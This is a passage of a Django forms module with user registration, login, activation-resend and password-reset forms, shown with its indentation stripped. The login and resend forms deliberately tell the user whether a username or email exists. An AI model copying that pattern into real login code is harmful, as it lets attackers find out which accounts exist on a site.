email = self.cleaned_data.get("email")
email2 = self.cleaned_data["email2"]
if settings.ST_CASE_INSENSITIVE_EMAILS:
email2 = email2.lower()
if email and email != email2:
raise forms.ValidationError(
_("The two email fields didn't match."))
return email2
def save(self, commit=True):
self.instance.is_active = False
self.instance.set_password(self.cleaned_data["password"])
return super(RegistrationForm, self).save(commit)
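# View-side sketch (hypothetical, not part of this module; the template and
# redirect names are assumed). It shows the usual way this form is driven:
#
#   def register(request):
#       form = RegistrationForm(data=request.POST or None)
#       if request.method == 'POST' and form.is_valid():
#           form.save()  # the user is created inactive, pending activation
#           return redirect('login')  # assumed URL name
#       return render(request, 'register.html', {'form': form})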
class LoginForm(AuthenticationForm):
username = forms.CharField(
label=_("Username or Email"),
max_length=254)
def __init__(self, *args, **kwargs):
super(LoginForm, self).__init__(*args, **kwargs)
self.error_messages['invalid_login'] = _("The password is not valid.")
def _validate_username(self):
"""
Check the username exists.\
Show if the username or email is invalid\
instead of the unclear "username or\
password is invalid" message.
"""
username = self.cleaned_data.get("username")
if not username:
return
if settings.ST_CASE_INSENSITIVE_USERNAMES:
username = username.lower()
is_found = (
User.objects
.filter(username=username)
.exists())
if is_found:
return
if settings.ST_CASE_INSENSITIVE_EMAILS:
username = username.lower()
is_found_email = (
User.objects
.filter(email=username)
.exists())
if is_found_email:
return
raise forms.ValidationError(
_("No account matches %(username)s.") % {
'username': username})
def clean(self):
self._validate_username()
return super(LoginForm, self).clean()
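# Binding sketch (hypothetical): AuthenticationForm subclasses take the
# request as their first positional argument, so a login view would do:
#
#   form = LoginForm(request, data=request.POST)
#   if form.is_valid():
#       login(request, form.get_user())  # django.contrib.auth.login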
class ResendActivationForm(forms.Form):
email = forms.CharField(
label=_("Email"),
widget=forms.EmailInput,
max_length=254)
def clean_email(self):
email = self.cleaned_data["email"]
if settings.ST_CASE_INSENSITIVE_EMAILS:
email = email.lower()
is_existent = (
User.objects
.filter(email=email)
.exists())
if not is_existent:
raise forms.ValidationError(
_("The provided email does not exists."))
self.user = (
User.objects
.filter(
email=email,
st__is_verified=False)
.order_by('-pk')
.first())
if not self.user:
raise forms.ValidationError(
_("This account is verified, try logging-in."))
return email
def get_user(self):
return self.user
class CustomPasswordResetForm(PasswordResetForm):
def send_mail(
self, subject_template_name, email_template_name,
context, from_email, to_email, html_email_template_name=None):
subject = render_to_string(subject_template_name, context)
subject = ''.join(subject.splitlines())
body = render_to_string(email_template_name, context)
tasks.send_email(subject, body, [to_email])
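# Wiring sketch (hypothetical; the URL pattern and name are assumed):
# Django's built-in PasswordResetView accepts a form_class override, which
# is how this form's task-based send_mail() gets put into service.
#
#   from django.contrib.auth import views as auth_views
#   from django.urls import path
#
#   urlpatterns = [
#       path('password-reset/', auth_views.PasswordResetView.as_view(
#           form_class=CustomPasswordResetForm), name='password_reset'),
#   ]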